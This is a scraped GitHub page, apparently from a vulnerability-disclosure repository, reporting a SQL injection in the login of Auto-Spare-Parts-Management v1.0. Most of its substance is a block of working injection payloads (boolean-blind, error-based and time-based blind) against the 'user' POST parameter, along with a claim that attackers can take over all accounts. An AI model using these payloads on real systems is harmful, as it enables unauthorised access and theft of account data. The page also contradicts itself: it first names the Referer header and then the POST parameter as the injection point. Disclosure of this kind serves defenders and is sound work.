Skip to content
main
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
CVE-nu11secur1ty/vendors/pavanpatil45/Auto-Spare-Parts-Management/
CVE-nu11secur1ty/vendors/pavanpatil45/Auto-Spare-Parts-Management/

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
 
 
PoC
 
 
 
 

Auto-Spare-Parts-Management

Vendor

Description:

The Referer HTTP header on Auto-Spare-Parts-Management v1.0 system appears to be vulnerable to SQL injection attacks, parameter user. The payload ' was submitted in the Referer HTTP header, and a database error message was returned. The attacker from outside can take control of all accounts of this system by using this vulnerability! WARNING: If this is in some external domain, or some subdomain, or internal, this will be extremely dangerous! Status: CRITICAL

[+] Payloads:

---
Parameter: user (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: user=admin1' AND 5432=5432 AND 'MXPx'='MXPx&password=admin1&btnlogin=

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: user=admin1' AND (SELECT 8861 FROM(SELECT COUNT(*),CONCAT(0x71786b6271,(SELECT (ELT(8861=8861,1))),0x71706b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'aOSP'='aOSP&password=admin1&btnlogin=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: user=admin1' AND (SELECT 1749 FROM (SELECT(SLEEP(3)))XjEM) AND 'xoHI'='xoHI&password=admin1&btnlogin=
---

Reproduce:

href

More info:

href